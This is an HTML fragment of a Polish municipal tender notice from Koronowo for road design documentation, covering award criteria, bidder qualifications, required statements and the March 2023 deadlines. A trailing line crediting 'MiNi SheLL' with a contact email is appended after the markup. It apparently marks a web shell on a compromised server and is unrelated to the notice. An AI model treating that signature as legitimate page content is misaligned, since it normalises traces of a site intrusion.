class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w niniejszym rozdziale, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Dla zadań 1, 4:<br/>- Wykonawca musi wykazać, że posiada doświadczenie w postaci wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch zamówień, polegających na opracowaniu dokumentacji projektowej dotyczącej budowy, przebudowy lub rozbudowy drogi, o długości powyżej 2 km każdej z nich. <br/>- Wykonawca musi wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, w tym przynajmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej z doświadczeniem minimum 2 lat pracy w branży drogowej jako projektant (doświadczenie projektanta stanowi kryterium oceny ofert).<br/>Dla zadań 2, 3, 5, 6 i 7:<br/>- Wykonawca musi wykazać, że posiada doświadczenie w postaci wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch zamówień, polegających na opracowaniu dokumentacji projektowej dotyczącej budowy, przebudowy lub rozbudowy drogi, o długości powyżej 1 km każdej z nich. <br/>- Wykonawca musi wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, w tym przynajmniej 1 osobą posiadającą uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej z doświadczeniem minimum 2 lat pracy w branży drogowej jako projektant (doświadczenie projektanta stanowi kryterium oceny ofert). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/>2. Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz usług wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. <br/>2. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenie o braku podstaw wykluczenia z postępowania na podstawie art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. poz. 835). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VIII pkt. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 455 uPzp oraz wskazanym we wzorze umowy, stanowiącym Załącznik nr 3 do SWZ.<br/>2. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/koronowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-17 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com